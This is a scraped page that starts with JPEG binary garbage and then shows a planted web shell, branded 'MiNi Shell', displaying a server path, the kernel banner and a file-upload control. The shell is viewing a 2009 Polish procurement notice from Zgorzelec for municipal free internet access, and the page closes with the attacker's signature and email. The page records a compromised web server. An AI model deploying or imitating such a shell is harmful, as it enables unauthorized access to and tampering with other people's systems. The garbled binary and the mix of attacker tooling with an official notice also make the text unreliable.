JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/114239-N-2009.html

<p class="kh_header"><b>Zgorzelec: Uruchomienie i świadczenie usługi dostępu do Internetu na terenie miasta Zgorzelec w wybranych lokalizacjach przez okres 12 miesięcy</b><br>
<b>Numer ogłoszenia: 114239 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uruchomienie i świadczenie usługi dostępu do Internetu na terenie miasta Zgorzelec w wybranych lokalizacjach przez okres 12 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie powyżej 14 000 euro a poniżej kwot określonych w art.11 ust.8 ustawy z dnia 29 .01. 2004r. Prawo Zamówień Publicznych
1.Przedmiotem zamówienia jest usługa polegająca na  wdrożeniu na okres 12 miesięcy pilotażowego projektu  bezpłatnego  dostępu do Internetu na terenie miasta w wybranych lokalizacjach: Strefa 1  i  Strefa 2 ( zasięg strefy 1 i strefy 2  określa załącznik nr  1  do niniejszej SIWZ) .
2. Ilość punktów dostępowych w danej Strefie  leży w gestii Operatora.
3. Zamawiający określa następujące założenia dotyczące realizacji usługi:
a) dostęp do sieci Internet w standardzie : WiFi 802.11  b i g lub przewodowym, dowolnym medium i w dowolnej technologii dostępu ( zakończony gniazdem RJ 45  dla użytkownika końcowego, w tym przypadku podłączenie z urządzeniem końcowym użytkownika ( kartą sieciową )  odbywać się  będzie przez kabel sieciowy kat.5  z wtykiem RJ 45 ),
b) zarówno w przypadku technologii przewodowych jak i bezprzewodowych o kolejności instalacji (wydania niezbędnych danych do logowania) decyduje kolejność zgłoszenia potencjalnych użytkowników do BOK Wykonawcy,
c)  Zamawiający określa minimalne parametry usługi dla jednego odbiorcy : 
- nie mniej niż 128 kbit/s i nie więcej niż 256 kbit/s  (download - pobieranie treści z Internetu) ,
- nie mniej niż 64 kbit/s  i nie więcej niż 128 kbit/s  (upload -  wysyłanie treści do Internetu), z zastrzeżeniem, że prędkość pomiędzy urządzeniem końcowym użytkownika (urządzeniem typu PC, laptop, palmtop , telefon GSM itp. ), a punktem dostępowym (hot-spotem, węzłem sieci itp.) może być większa,
d) Wykonawca opracuje dokumentację pomocową dla użytkowników mówiącą jak dokonać podłączenia do bezpłatnej sieci, jak radzić sobie z najczęściej występującymi problemami oraz przygotuje do akceptacji ze strony Zamawiającego wzór ulotki propagującej usługę,
e)  Wykonawca opracuje i przedstawi do akceptacji Zamawiającego Regulamin korzystania z dostępu do usługi bezpłatnego dostępu do internetu (Postanowienia które Wykonawca winien zawrzeć w Regulaminie stanowią załącznik nr 2 do SIWZ)
f)  zaakceptowaną przez Zamawiającego ulotkę propagującą usługę, dokumentację pomocową dla użytkowników mówiącą jak dokonać podłączenia do bezpłatnej sieci oraz Regulamin korzystania z dostępu do usługi bezpłatnego dostępu do internet Wykonawca zobowiązany będzie umieścić przez cały okres trwania usługi na własnej stronie internetowej,
g)  podczas logowania się Użytkowników do sieci, w pierwszej kolejności włączać winna się zaakceptowana przez Zamawiającego ulotka propagującą usługę, natomiast warunkiem skutecznego logowania od sieci winna być akceptacja przez Użytkownika zapisów Regulaminu korzystania z dostępu do usługi bezpłatnego dostępu do internet,
h) czas trwania 1 sesji - 3 godziny - karencja 1 godzina,
i) Zamawiający ustala następujący standard zabezpieczeń usługi :
- identyfikacja użytkownika ( adres MAC oraz IP ) 
- izolacja klientów sieci (brak wymiany danych pomiędzy użytkownikami w ramach podsieci)
- kontrola pasma wg pkt.1 
- filtr usług, blokada: sieci P2P, ograniczenia w pobieraniu dużych plików (większych niż 100 MB) 
- blokada treści pornograficznych,
j) Obowiązkiem Wykonawcy będzie przekazywanie Zamawiającemu wraz z fakturą statystyk miesięcznego ruchu i liczby użytkowników (podstawa płatności). Sposób przekazywania  statystyk miesięcznego ruchu określona została w projekcie umowy stanowiącej załącznik nr 8 do SIWZ,
k) Wymagana zdolność obciążenia systemu dostępu do Internetu w rozbiciu na poszczególne strefy na  poziomie : Strefa 1 - 300 użytkowników (jednocześnie) , Strefa 2 - 80 użytkowników (jednocześnie),
l) Logowanie ruchu i przechowywanie logów zgodnie  z obowiązującymi przepisami,
ł)  Użytkownicy darmowego  dostępu do Internetu uzyskają dane niezbędne do połączenia do sieci po okazaniu w siedzibie Wykonawcy:
-  dokumentu tożsamości,
-  MAC adresu własnego urządzenia 
-  złożeniu Oświadczenia (Wzór oświadczenia stanowią załącznik nr  3 do niniejszej SIWZ) Wykonawca przechowuje dane osobowe zgodnie z obowiązującymi przepisami.
Wykonawca przygotowuje również formularz na swojej stronie internetowej umożliwiający wprowadzenie ww. danych i ich wydruk . Strona winna być zabezpieczona protokołem SSL ,
m) Zestawy do korzystania z bezprzewodowego dostępu w gestii potencjalnych użytkowników.W przypadku technologii przewodowych Wykonawca umożliwi bezpłatną dzierżawę przez Użytkownika urządzenia końcowego ( jeśli jest wymagane) na okres trwania usługi.  
4. Usługa dostępu do Internetu na terenie miasta Zgorzelec może być świadczona wyłącznie przez Wykonawcę posiadającego swój oddział, filię, ekspozyturę, punkt obsługi klienta lub biuro obsługi klienta znajdujące się na terenie Miasta Zgorzelec, w którym możliwe będzie wydawanie użytkownikom odpowiednich danych do logowania, w dni robocze w godzinach od 9:00 do 15:00. 
Zamawiający dopuszcza możliwość złożenia w ofercie oświadczenia Wykonawcy, że oddział, filia, ekspozytura, punkt obsługi klienta lub biuro obsługi klienta Wykonawcy uruchomiony zostanie najpóźniej na tydzień przed uruchomieniem usługi
Oddział, filia, ekspozytura, punkt obsługi klienta lub biuro obsługi klienta wybranego Wykonawcy będzie utrzymywany na terenie Miasta Zgorzelec przez cały okres związania umową ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.31.62.12-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy:
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia, 
d)  nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie z art.24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych.
e) złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia
2.  Zamawiający informuje, ze w przypadku Wykonawców wspólnie ubiegających sie o udzielenie  zamówienia, muszą zostać spełnione warunki, odpowiednio:
a) warunki określone w art. 22 ust. 1 pkt. 1 i pkt. 4 ustawy PZP muszą zostać spełnione przez każdego z wykonawców wspólnie ubiegających się o zamówienie,
b) warunki określone w art. 22 ust. 1 pkt. 2 i 3 mogą być spełnione przez każdego  z wykonawców, kilku lub łącznie przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,	
c) przy ocenie spełniania warunków udziału w postępowaniu, o których mowa w ppkt. b wielkości stanowiące o spełnianiu warunków będą zsumowane.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o dokumenty wymagane w SIWZ  metodą spełnia / nie spełnia. Wykonawcy, którzy nie załączą dokumentu potwierdzającego spełnianie choć jednego z warunków udziału w postępowaniu zostaną, z zastrzeżeniem art. 26 ust.3 ustawy Prawo Zamówień Publicznych, wykluczeni z postępowania, a ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełniania warunku posiadania uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający żąda załączenia do oferty :
a) Zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych o którym mowa w art. 10 i art. 11 ustawy z dnia 16 lipca 2004 roku Prawo telekomunikacyjne, wydanego przez Prezesa UKE (Dz. U. Nr 171 z 2004 roku, poz. 1800 z późn. zmianami).
b) Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w  postępowaniu o udzielenie zamówienia albo składania ofert, 
c) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,
d) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert, 
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.b) i d) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.c) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo  zamieszkania osoby której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo Zamówień Publicznych.
(dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu  o udzielenie zamówienia albo składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o  udzielenie zamówienia albo składania ofert,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec 
ul. Domańskiego 7 , 59-900 Zgorzelec, Wydział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7,  Punkt Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com